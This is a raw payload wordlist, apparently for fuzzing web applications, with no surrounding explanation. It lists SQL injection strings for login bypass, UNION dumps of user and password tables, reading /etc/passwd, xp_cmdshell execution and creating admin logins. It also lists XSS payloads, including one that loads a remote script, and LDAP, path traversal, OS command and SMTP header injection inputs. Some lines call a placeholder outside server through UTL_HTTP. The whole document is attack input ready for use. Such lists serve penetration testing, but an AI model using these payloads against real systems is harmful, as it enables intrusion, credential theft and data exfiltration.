`
'
"
;
'#
 AND 1=1 --
 AND 1=1+--+
'-
 AND 1=2--
'/*
' AND '1'='1
||6
'||'6
(||6)
 OR 1=1--
' OR '1'='1
; OR '1'='1'
%00' or 1=1 --
%00" or 1=1 --
%27+--+
" OR 1=1--
' OR 1=1/*
or 1=1--
or 1=1--
or 1=1 --
%00or 1=1 --
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
%00' or 'a'='a
%00" or "a"="a
%00') or ('a'='a
%00") or ("a"="a
%27+or+1%3D1+--+
%22+or+1%3D1+--+
%00%27+or+1%3D1+--+
%00%22+or+1%3D1+--+
or+1%3D1+--+
%22+or+%22a%22%3D%22a
%27%29+or+%28%27a%27%3D%27a
%22%29+or+%28%22a%22%3D%22a
1'%20or%20'1'%20=%20'1'))/*
%001'%20or%20'1'%20=%20'1'))/*
1'%20or%20'1'%20=%20'1'))%20--%20
%001'%20or%20'1'%20=%20'1'))%20--%20
1' or '1' = '1')) LIMIT 1/*
1&#39; or &#39;1&#39; = &#39;1&#39;)) LIMIT 1/*
1'%20or%20'1'%20=%20'1'))%20--%20
"%20or%201=1%20--%20
'%20or%201=1%20--%20
%27%2520or%25201%3D1%2520--%2520
%00"%20or%201=1%20--%20
%00'%20or%201=1%20--%20
%00%27%2520or%25201%3D1%2520--%2520
NULL OR 1 = 1/*
NULL+OR+1%3D1%2F%2A
NULL OR 'value'='value'/*
NULL%0aOR%0a'value'='value'/*
NULL UNION ALL SELECT user,pass, FROM user_db WHERE user LIKE '%admin%/*
NULL/**/UNION/**/ALL/**/SELECT/**/user,pass,/**/FROM/**/user_db/**/WHERE/**/uid/**/=/*evade*/'1'//
Admin'OR'
' having 1=1--
' OR 'text'=N'text'
' OR 2>1
' OR 'text'>'t'
' union select
Password:*/=1--
' or 1/*
' or 1=1/*
%22+or+isnull%281%2F0%29+%2F*
' group by userid having 1=1--
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
CREATE USER name IDENTIFIED BY 'pass123'
' union select 1,load_file('/etc/passwd'),1,1,1;
';exec master..xp_cmdshell 'ping 10.10.1.2'--
exec sp_addsrvrolemember 'name', 'sysadmin'
GRANT CONNECT TO name; GRANT RESOURCE TO name;
' union select * from users wheer login = char(114,111,111,116);
'/**/OR/**/1/**/=/**/1
' or 1 in (select@@version)--
' OR 'unusual'='unusual'
' OR 'something' = 'some'+'thing'
' OR 'something' like 'some%'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
UNI/**/ON SEL/**/ECT
';EXEC ('SEL'+'ECT US'+'ER')
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
' and 1 in (select var from temp)--
exec sp_addlogin 'name','password'
@var select @var as var into temp end --
1 UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)--
1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from EMPLOYEE_NAME --
'
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
a'
?
' or 1=1
ý or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
ý or 3=3 --
' or ''='<script>alert('iCConsult')</script>
%3Cscript%3Ealert%28%27icconsult%27%29%3C/script%3E
\<script\>alert(\'iCConsult3\')\<\/script\>
%5C%3Cscript%5C%3Ealert%28%5C%27icconsult%5C%27%29%5C%3C%5C/script%5C%3E
&lt;script&gt;alert('icconsult')&lt;/script&gt;
<scr ipt>alert('icconsult')</scr ipt>
"><script>alert('icconsult')</script>
"><script>alert('icconsult')</script><"
'><script>alert('icconsult')</script>
'><script>alert('icconsult')</script><'
<SCRIPT>alert('icconsult');</SCRIPT>
<scri<script>pt>alert('icconsult');</scr</script>ipt>
<SCRI<script>PT>alert('icconsult');</SCR</script>IPT>
<scri<scr<script>ipt>pt>alert('icconsult');</scr</sc</script>ript>ipt>
";alert('icconsult');"
';alert('icconsult');'
;alert('icconsult');
alert('icconsult');
<SCR%00IPT>alert('icconsult')</SCR%00IPT>
\";alert('icconsult');//
<STYLE TYPE="text/javascript">alert('icconsult');</STYLE>
<<SCRIPT>alert('icconsult')//<</SCRIPT>
"{EVENTHANDLER}=alert('icconsult')
<<SCRIPT>alert('icconsult')//<</SCRIPT>
<img src="1" onerror="alert('icconsult')">
<img src='1' onerror='alert('icconsult')'
onerror="alert('icconsult')"
onerror='alert('icconsult')'
onload="alert('icconsult')"
onload='alert('icconsult')'
<IMG """><SCRIPT>alert('icconsult')</SCRIPT>">
<IMG '''><SCRIPT>alert('icconsult')</SCRIPT>'>
"""><SCRIPT>alert('icconsult')
'''><SCRIPT>alert('icconsult')'
<IFRAME SRC='f' onerror="alert('icconsult')"></IFRAME>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode<script>alert('xss')</script>
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
'
'--
' or 1=1--
1 or 1=1--
' or 1 in (@@version)--
1 or 1 in (@@version)--
'; waitfor delay '0:30:0'--
1; waitfor delay '0:30:0'--
'||Utl_Http.request('http://<yourservername>') from dual--
1||Utl_Http.request('http://<yourservername>') from dual--
xsstest
xsstest%00"<>'
</foo>
<foo></foo>
))))))))))
../../../../../../../../../../etc/passwd
../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\windows\win.ini
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
| ping -i 30 127.0.0.1 |
| ping -n 30 127.0.0.1 |
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
; ping 127.0.0.1 ;
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
;echo 111111
echo 111111
response.write 111111
:response.write 111111
http://<yourservername>/
<youremail>%0aCc:<youremail>
<youremail>%0d%0aCc:<youremail>
<youremail>%0aBcc:<youremail>
<youremail>%0d%0aBcc:<youremail>
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a